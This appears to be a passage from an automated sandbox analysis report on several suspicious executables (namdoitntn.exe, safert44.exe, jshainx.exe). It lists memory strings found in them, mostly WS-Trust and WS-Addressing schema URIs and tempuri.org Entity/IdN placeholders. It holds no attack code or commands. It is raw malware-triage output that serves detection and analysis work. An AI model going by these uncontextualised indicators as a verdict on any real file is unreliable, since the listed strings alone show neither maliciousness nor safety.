                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                    Source: namdoitntn.exe, 00000015.00000002.867825172.00000000031C3000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000028.00000002.865147865.0000000002A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                    Source: safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                    Source: namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16V
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                    Source: safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                    Source: safert44.exe, 00000017.00000002.867679573.000000000281C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                    Source: namdoitntn.exe, 00000015.00000002.858241255.0000000003081000.00000004.00000800.00020000.00000000.sdmp, namdoitntn.exe, 00000015.00000002.862224892.0000000003112000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000017.00000002.860675648.0000000002721000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.866257427.0000000002621000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.862606563.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
